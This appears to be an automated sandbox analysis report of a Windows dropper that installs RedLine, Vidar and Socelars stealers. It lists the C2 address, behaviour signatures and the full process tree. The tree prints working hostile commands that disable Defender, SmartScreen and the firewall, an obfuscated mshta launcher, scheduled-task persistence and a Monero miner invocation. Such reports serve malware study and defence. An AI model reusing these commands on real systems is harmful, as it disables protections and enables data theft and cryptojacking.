Analysis
-
max time kernel
1797s -
max time network
1801s -
platform
windows11_x64 -
resource
win11 -
submitted
15-09-2021 19:17
General
-
Target
setup_x86_x64_install.exe
-
Size
6.2MB
-
MD5
f944d681d4aef5cd2b92424c6f2a24a9
-
SHA1
725d06f330b6ab00e2b3332b725114c1564569f4
-
SHA256
80594c4ce01c53c6bcc472e88329cc23f51b0d3276c8f5b3a686033f8d2d452e
-
SHA512
db839da4190e0535d4b8ddb54681b90314e24b64ca381dc8a0889846709e1591b75c3d21364f7ab47a3d7c1367741b06e6141540d22f9c8745cdd57cbdf2624f
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
ANI
C2
45.142.215.47:27643
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies security service 2 TTPs 1 IoCs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 48 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 43 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 64 IoCs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 34 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 2 IoCs
-
Loads dropped DLL 51 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 15 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 15 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 31 IoCs
-
Suspicious use of SetThreadContext 12 IoCs
-
Drops file in Program Files directory 25 IoCs
-
Drops file in Windows directory 37 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 43 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 64 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies data under HKEY_USERS 50 IoCs
-
Modifies registry class 47 IoCs
-
Modifies system certificate store 2 TTPs 8 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 5 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue1855eca24182.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue1855eca24182.exeTue1855eca24182.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\z8Coyt5UgoBgqaYV6VXYjAvt.exe"C:\Users\Admin\Documents\z8Coyt5UgoBgqaYV6VXYjAvt.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\8aLgopXSWT0GacBpDZEm3i8Y.exe"C:\Users\Admin\Documents\8aLgopXSWT0GacBpDZEm3i8Y.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\F7roz0Ota5IBz0cufucFCxjW.exe"C:\Users\Admin\Documents\F7roz0Ota5IBz0cufucFCxjW.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\zKvkPgoUoQrRvbQlzcYd65g8.exe"C:\Users\Admin\Documents\zKvkPgoUoQrRvbQlzcYd65g8.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\30oG0OP7NYfaWO4GcMbW7D0L.exe"C:\Users\Admin\Documents\30oG0OP7NYfaWO4GcMbW7D0L.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\uR_CtPbg5mmtQmG_l8Bt958m.exe"C:\Users\Admin\Documents\uR_CtPbg5mmtQmG_l8Bt958m.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 2847⤵
- Program crash
- Checks processor information in registry
-
C:\Users\Admin\Documents\BF9zB6Eyye8UqyTV4aFRDwKN.exe"C:\Users\Admin\Documents\BF9zB6Eyye8UqyTV4aFRDwKN.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\BF9zB6Eyye8UqyTV4aFRDwKN.exe"C:\Users\Admin\Documents\BF9zB6Eyye8UqyTV4aFRDwKN.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\CwwLzIhsi9dKCBl3PW6OG7RI.exe"C:\Users\Admin\Documents\CwwLzIhsi9dKCBl3PW6OG7RI.exe"6⤵
-
C:\Users\Admin\Documents\qcUDNwB8SEN94ea7mqx9oEuV.exe"C:\Users\Admin\Documents\qcUDNwB8SEN94ea7mqx9oEuV.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\X5EIXF574klnyB1iaY6vdQ2G.exe"C:\Users\Admin\Documents\X5EIXF574klnyB1iaY6vdQ2G.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\3Q5sCERcVBOa4f6rQsMryxxv.exe"C:\Users\Admin\Documents\3Q5sCERcVBOa4f6rQsMryxxv.exe"6⤵
-
C:\Users\Admin\Documents\ZmtsouZFxbZoKgeX0hK5WdK9.exe"C:\Users\Admin\Documents\ZmtsouZFxbZoKgeX0hK5WdK9.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2927⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\VTzSCI0pZnNWmzdGginVRgik.exe"C:\Users\Admin\Documents\VTzSCI0pZnNWmzdGginVRgik.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4608 -s 2447⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\ejocZdJ3E13T9zA2aIuXmOKU.exe"C:\Users\Admin\Documents\ejocZdJ3E13T9zA2aIuXmOKU.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6096 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\GsY_FQ4ykik3X0dVtTWZpr_I.exe"C:\Users\Admin\Documents\GsY_FQ4ykik3X0dVtTWZpr_I.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpC886_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpC886_tmp.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpC886_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpC886_tmp.exe8⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 289⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\BRLA_lpCX6_CPAjuajMeggMe.exe"C:\Users\Admin\Documents\BRLA_lpCX6_CPAjuajMeggMe.exe"6⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\tUHw_2btzgJbiKjD1ids8HAq.exe"C:\Users\Admin\Documents\tUHw_2btzgJbiKjD1ids8HAq.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\iekyVcgnPGYBxaEG93AsYsf_.exe"C:\Users\Admin\Documents\iekyVcgnPGYBxaEG93AsYsf_.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\uJMjb0zTZ0qk8dn35A87jAQi.exe"C:\Users\Admin\Documents\uJMjb0zTZ0qk8dn35A87jAQi.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: CLOse ( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\uJMjb0zTZ0qk8dn35A87jAQi.exe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF """"== """" for %w In ( ""C:\Users\Admin\Documents\uJMjb0zTZ0qk8dn35A87jAQi.exe"" ) do taskkill /F -iM ""%~nxw"" " , 0 , tRUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\uJMjb0zTZ0qk8dn35A87jAQi.exe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj& IF ""== "" for %w In ( "C:\Users\Admin\Documents\uJMjb0zTZ0qk8dn35A87jAQi.exe" ) do taskkill /F -iM "%~nxw"8⤵
-
C:\Users\Admin\AppData\Local\Temp\CndH5V.EXeCndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT: CLOse ( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF ""-pHMKPyuuVVnjhxYIEreJKQmnfTDzj""== """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" ) do taskkill /F -iM ""%~nxw"" " , 0 , tRUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj& IF "-pHMKPyuuVVnjhxYIEreJKQmnfTDzj"== "" for %w In ( "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" ) do taskkill /F -iM "%~nxw"11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" bFut_Y.g_U,GpozpZJ10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -iM "uJMjb0zTZ0qk8dn35A87jAQi.exe"9⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\wl0bOdRLYWpDidUvYFnideKw.exe"C:\Users\Admin\Documents\wl0bOdRLYWpDidUvYFnideKw.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\wl0bOdRLYWpDidUvYFnideKw.exeC:\Users\Admin\Documents\wl0bOdRLYWpDidUvYFnideKw.exe7⤵
-
C:\Users\Admin\Documents\toMW9FsMhmLtxorMvhYvwpBe.exe"C:\Users\Admin\Documents\toMW9FsMhmLtxorMvhYvwpBe.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 2767⤵
- Program crash
-
C:\Users\Admin\Documents\n7AVbhjG49few9oZTGdGFGQQ.exe"C:\Users\Admin\Documents\n7AVbhjG49few9oZTGdGFGQQ.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\n7AVbhjG49few9oZTGdGFGQQ.exeC:\Users\Admin\Documents\n7AVbhjG49few9oZTGdGFGQQ.exe7⤵
-
C:\Users\Admin\Documents\o10zas5nF8Omtoa2L6gfvvqg.exe"C:\Users\Admin\Documents\o10zas5nF8Omtoa2L6gfvvqg.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\Bd2Z_EDKHp60rDpjtXj0ZRbG.exe"C:\Users\Admin\Documents\Bd2Z_EDKHp60rDpjtXj0ZRbG.exe"6⤵
-
C:\Users\Admin\Documents\UZjdlAe0VOK5pAMHRxTEA4EQ.exe"C:\Users\Admin\Documents\UZjdlAe0VOK5pAMHRxTEA4EQ.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\msetup.exe"C:\Users\Admin\AppData\Local\Temp\msetup.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NL4J3.tmp\msetup.tmp"C:\Users\Admin\AppData\Local\Temp\is-NL4J3.tmp\msetup.tmp" /SL5="$204F8,3709094,831488,C:\Users\Admin\AppData\Local\Temp\msetup.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\msetup.exe"C:\Users\Admin\AppData\Local\Temp\msetup.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LTK7F.tmp\msetup.tmp"C:\Users\Admin\AppData\Local\Temp\is-LTK7F.tmp\msetup.tmp" /SL5="$403BC,3709094,831488,C:\Users\Admin\AppData\Local\Temp\msetup.exe" /VERYSILENT10⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\VideoPad Framework\vpadtool.exe"C:\Users\Admin\AppData\Roaming\VideoPad Framework\vpadtool.exe"11⤵
- Drops startup file
- Loads dropped DLL
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(exit)12⤵
- Modifies security service
-
C:\ProgramData\Systemd\Database.exe-o pool.minexmr.com:4444 -u 42LC2r5anTLB9XpDxhtjLiTzjtWhw37qee9Qye71uDX2PtfgKCgk2SWPwe2MuzKsE2JDGzpro1v4gfr2bDRVokauL7KPiRr -p password1337 --coin=XMR --cpu-max-threads-hint=8012⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\jBLJ125cmA8WNJtfxkNHlTQe.exe"C:\Users\Admin\Documents\jBLJ125cmA8WNJtfxkNHlTQe.exe"6⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\jBLJ125cmA8WNJtfxkNHlTQe.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\vioKF0jB3yt2NXw5eD5sHKlp.exe"C:\Users\Admin\Documents\vioKF0jB3yt2NXw5eD5sHKlp.exe"6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Riempiuti.mpg7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ZNvHaEhYXOrMLiQTEjZiqnWwlLOExENKgeAZNuYpTaHezaAdeCRwWEsBRcvHPJEaqzbIHQunhPgIRTHSlnCRNLNJKZosJszpOgeqURJk$" Seguitare.mpg9⤵
-
C:\Users\Admin\AppData\Roaming\Animatrici.exe.comAnimatrici.exe.com E9⤵
-
C:\Users\Admin\AppData\Roaming\Animatrici.exe.comC:\Users\Admin\AppData\Roaming\Animatrici.exe.com E10⤵
-
C:\Users\Admin\AppData\Roaming\Animatrici.exe.comC:\Users\Admin\AppData\Roaming\Animatrici.exe.com E11⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\RegAsm.exeC:\Users\Admin\AppData\Roaming\RegAsm.exe12⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost9⤵
- Runs ping.exe
-
C:\Users\Admin\Documents\fNzPKb0J4Svd7KwPes8ppbIZ.exe"C:\Users\Admin\Documents\fNzPKb0J4Svd7KwPes8ppbIZ.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\tWyx3To7BRDvoe4tex6ZBhOY.exe"C:\Users\Admin\Documents\tWyx3To7BRDvoe4tex6ZBhOY.exe"6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 6167⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 6247⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 7247⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 8407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IVKM0.tmp\installer.tmp"C:\Users\Admin\AppData\Local\Temp\is-IVKM0.tmp\installer.tmp" /SL5="$2040A,1158062,843264,C:\Users\Admin\AppData\Local\Temp\installer.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\VC_redist.x64.exe/install /quiet7⤵
-
C:\Windows\Temp\{30ACDC76-5CA2-4DC9-8CCC-4E61EE4C045A}\.cr\VC_redist.x64.exe"C:\Windows\Temp\{30ACDC76-5CA2-4DC9-8CCC-4E61EE4C045A}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x64.exe" -burn.filehandle.attached=544 -burn.filehandle.self=552 /quiet8⤵
- Loads dropped DLL
-
C:\Windows\Temp\{071BB44F-B76E-4749-B089-B0248F1EA023}\.be\VC_redist.x64.exe"C:\Windows\Temp\{071BB44F-B76E-4749-B089-B0248F1EA023}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{95C467E8-8455-4DD9-8119-04B27983EC6F} {DBB9706A-CAE2-494E-B1C6-F479C50C4348} 75529⤵
- Adds Run key to start application
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7552 -s 13729⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\VC_redist.x86.exe/install /quiet7⤵
-
C:\Windows\Temp\{E7583BBE-D83E-460D-BA56-4515B7FADA07}\.cr\VC_redist.x86.exe"C:\Windows\Temp\{E7583BBE-D83E-460D-BA56-4515B7FADA07}\.cr\VC_redist.x86.exe" -burn.clean.room="C:\Users\Admin\Documents\VC_redist.x86.exe" -burn.filehandle.attached=572 -burn.filehandle.self=708 /quiet8⤵
- Loads dropped DLL
-
C:\Windows\Temp\{E55A302E-879A-4C8B-8AD0-1E3E089A00FE}\.be\VC_redist.x86.exe"C:\Windows\Temp\{E55A302E-879A-4C8B-8AD0-1E3E089A00FE}\.be\VC_redist.x86.exe" -q -burn.elevated BurnPipe.{BF2CC799-9FEE-4AB6-A0FE-E3E095391910} {42463591-95A5-4988-B504-0E1426EEE393} 79569⤵
- Adds Run key to start application
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7956 -s 8529⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 9887⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 8447⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5056 -s 9767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue18532bd4421223a36.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue18532bd4421223a36.exeTue18532bd4421223a36.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-8I0CR.tmp\Tue18532bd4421223a36.tmp"C:\Users\Admin\AppData\Local\Temp\is-8I0CR.tmp\Tue18532bd4421223a36.tmp" /SL5="$70030,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC10E2BE3\Tue18532bd4421223a36.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-F6G6S.tmp\___YHDG34.exe"C:\Users\Admin\AppData\Local\Temp\is-F6G6S.tmp\___YHDG34.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Common Files\REOPCXEKOF\ultramediaburner.exe"C:\Program Files\Common Files\REOPCXEKOF\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-A0I2E.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-A0I2E.tmp\ultramediaburner.tmp" /SL5="$7026E,281924,62464,C:\Program Files\Common Files\REOPCXEKOF\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6b-4a819-e8d-864aa-e66eb01961c5a\Xyneqaebaesi.exe"C:\Users\Admin\AppData\Local\Temp\6b-4a819-e8d-864aa-e66eb01961c5a\Xyneqaebaesi.exe"8⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8e31d46f8,0x7ff8e31d4708,0x7ff8e31d471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,11260227801501698291,10079995603203865107,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:110⤵
-
